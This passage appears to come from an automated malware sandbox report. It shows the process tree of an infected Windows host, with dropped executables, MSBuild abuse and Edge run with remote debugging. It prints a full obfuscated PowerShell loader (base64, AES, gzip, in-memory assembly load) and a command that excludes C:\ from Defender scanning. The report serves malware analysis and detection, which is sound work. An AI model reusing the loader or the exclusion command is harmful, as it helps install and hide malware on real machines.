                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x264,0x7ffc3541f208,0x7ffc3541f214,0x7ffc3541f220
                                          11⤵
                                            PID:4320
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1952,i,15368900939926735033,17371497492238441349,262144 --variations-seed-version --mojo-platform-channel-handle=1948 /prefetch:2
                                            11⤵
                                              PID:11404
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=2052,i,15368900939926735033,17371497492238441349,262144 --variations-seed-version --mojo-platform-channel-handle=2068 /prefetch:3
                                              11⤵
                                                PID:11376
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2508,i,15368900939926735033,17371497492238441349,262144 --variations-seed-version --mojo-platform-channel-handle=2512 /prefetch:8
                                                11⤵
                                                  PID:11440
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3580,i,15368900939926735033,17371497492238441349,262144 --variations-seed-version --mojo-platform-channel-handle=3640 /prefetch:1
                                                  11⤵
                                                  • Uses browser remote debugging
                                                  PID:11952
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3596,i,15368900939926735033,17371497492238441349,262144 --variations-seed-version --mojo-platform-channel-handle=3652 /prefetch:1
                                                  11⤵
                                                  • Uses browser remote debugging
                                                  PID:13268
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4184,i,15368900939926735033,17371497492238441349,262144 --variations-seed-version --mojo-platform-channel-handle=4244 /prefetch:1
                                                  11⤵
                                                  • Uses browser remote debugging
                                                  PID:13252
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4192,i,15368900939926735033,17371497492238441349,262144 --variations-seed-version --mojo-platform-channel-handle=4248 /prefetch:2
                                                  11⤵
                                                  • Uses browser remote debugging
                                                  PID:13280
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4500,i,15368900939926735033,17371497492238441349,262144 --variations-seed-version --mojo-platform-channel-handle=4200 /prefetch:8
                                                  11⤵
                                                    PID:12452
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5268,i,15368900939926735033,17371497492238441349,262144 --variations-seed-version --mojo-platform-channel-handle=5292 /prefetch:8
                                                    11⤵
                                                      PID:13084
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5016,i,15368900939926735033,17371497492238441349,262144 --variations-seed-version --mojo-platform-channel-handle=5492 /prefetch:8
                                                      11⤵
                                                        PID:11136
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5464,i,15368900939926735033,17371497492238441349,262144 --variations-seed-version --mojo-platform-channel-handle=5556 /prefetch:8
                                                        11⤵
                                                          PID:11124
                                                      • C:\ProgramData\r9zmglf3ek.exe
                                                        "C:\ProgramData\r9zmglf3ek.exe"
                                                        10⤵
                                                          PID:10028
                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                            11⤵
                                                              PID:7768
                                                      • C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe"
                                                        8⤵
                                                          PID:5828
                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                            9⤵
                                                              PID:12616
                                                          • C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe"
                                                            8⤵
                                                              PID:12668
                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                9⤵
                                                                  PID:12156
                                                              • C:\Users\Admin\AppData\Local\Temp\10046340101\120e42aee2.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\10046340101\120e42aee2.exe"
                                                                8⤵
                                                                  PID:6768
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c copy Bc.wbk Bc.wbk.bat & Bc.wbk.bat
                                                                    9⤵
                                                                      PID:10016
                                                                  • C:\Users\Admin\AppData\Local\Temp\10047850101\crypted.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\10047850101\crypted.exe"
                                                                    8⤵
                                                                      PID:1524
                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                        9⤵
                                                                          PID:11676
                                                                      • C:\Users\Admin\AppData\Local\Temp\10053340101\crypted.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\10053340101\crypted.exe"
                                                                        8⤵
                                                                          PID:336
                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                            9⤵
                                                                              PID:6112
                                                                          • C:\Users\Admin\AppData\Local\Temp\10053350101\32b80bf1c3.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\10053350101\32b80bf1c3.exe"
                                                                            8⤵
                                                                              PID:4452
                                                                              • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\10053350101\32b80bf1c3.exe"
                                                                                9⤵
                                                                                  PID:1148
                                                                              • C:\Users\Admin\AppData\Local\Temp\10053360101\97b5f810da.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\10053360101\97b5f810da.exe"
                                                                                8⤵
                                                                                  PID:7172
                                                                            • C:\Users\Admin\AppData\Local\Temp\10479080101\92236c5097.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\10479080101\92236c5097.exe"
                                                                              6⤵
                                                                                PID:808
                                                                                • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\10479080101\92236c5097.exe"
                                                                                  7⤵
                                                                                    PID:2456
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10479091121\ccosvAs.cmd"
                                                                                  6⤵
                                                                                    PID:10204
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10479091121\ccosvAs.cmd"
                                                                                      7⤵
                                                                                        PID:12704
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                                                                                          8⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          PID:4364
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
                                                                                            9⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            PID:4140
                                                                                    • C:\Users\Admin\AppData\Local\Temp\10479100101\5e2f93f038.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\10479100101\5e2f93f038.exe"
                                                                                      6⤵
                                                                                        PID:5784
                                                                                      • C:\Users\Admin\AppData\Local\Temp\10479110101\YMauSAr.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\10479110101\YMauSAr.exe"
                                                                                        6⤵
                                                                                          PID:9116
                                                                                          • C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
                                                                                            C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
                                                                                            7⤵
                                                                                              PID:12696
                                                                                              • C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
                                                                                                C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
                                                                                                8⤵
                                                                                                  PID:7744
                                                                                                  • C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
                                                                                                    C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
                                                                                                    9⤵
                                                                                                      PID:9016
                                                                                                      • C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
                                                                                                        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
                                                                                                        10⤵
                                                                                                          PID:8672
                                                                                                          • C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
                                                                                                            C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
                                                                                                            11⤵
                                                                                                              PID:8124
                                                                                                              • C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
                                                                                                                C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
                                                                                                                12⤵
                                                                                                                  PID:6684
                                                                                                                  • C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
                                                                                                                    C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
                                                                                                                    13⤵
                                                                                                                      PID:7284
                                                                                                                      • C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
                                                                                                                        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
                                                                                                                        14⤵
                                                                                                                          PID:7668
                                                                                                                          • C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
                                                                                                                            C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
                                                                                                                            15⤵
                                                                                                                              PID:5936
                                                                                                                              • C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
                                                                                                                                C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
                                                                                                                                16⤵
                                                                                                                                  PID:12972
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
                                                                                                                                    C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
                                                                                                                                    17⤵
                                                                                                                                      PID:5664
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
                                                                                                                                        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
                                                                                                                                        18⤵
                                                                                                                                          PID:4524
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
                                                                                                                                            C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
                                                                                                                                            19⤵
                                                                                                                                              PID:4888
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
                                                                                                                                                C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
                                                                                                                                                20⤵
                                                                                                                                                  PID:12820
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
                                                                                                                                                    C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
                                                                                                                                                    21⤵
                                                                                                                                                      PID:12012
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
                                                                                                                                                        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
                                                                                                                                                        22⤵
                                                                                                                                                          PID:6712
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
                                                                                                                                                            23⤵
                                                                                                                                                              PID:2900
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
                                                                                                                                                                24⤵
                                                                                                                                                                  PID:8640
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
                                                                                                                                                                    25⤵
                                                                                                                                                                      PID:7464
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10479120101\44e8c21133.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10479120101\44e8c21133.exe"
                                                                                                                                6⤵
                                                                                                                                  PID:7864
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10479120101\44e8c21133.exe"
                                                                                                                                    7⤵
                                                                                                                                      PID:12020
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10479130101\crypted.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10479130101\crypted.exe"
                                                                                                                                    6⤵
                                                                                                                                      PID:4116
                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                        7⤵
                                                                                                                                          PID:7184
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10479140101\bfa6eb2ce4.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10479140101\bfa6eb2ce4.exe"
                                                                                                                                        6⤵
                                                                                                                                          PID:8036
                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                            7⤵
                                                                                                                                              PID:4288
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\5uMVCoG.exe
                                                                                                                                  1⤵
                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                  PID:3916
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\5uMVCoG.exe
                                                                                                                                    C:\Users\Admin\AppData\Roaming\5uMVCoG.exe
                                                                                                                                    2⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:4208
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                  1⤵
                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Identifies Wine through registry keys
                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  PID:3468
                                                                                                                                • C:\Users\Admin\AppData\Roaming\5uMVCoG.exe
                                                                                                                                  C:\Users\Admin\AppData\Roaming\5uMVCoG.exe
                                                                                                                                  1⤵
                                                                                                                                  • Executes dropped EXE
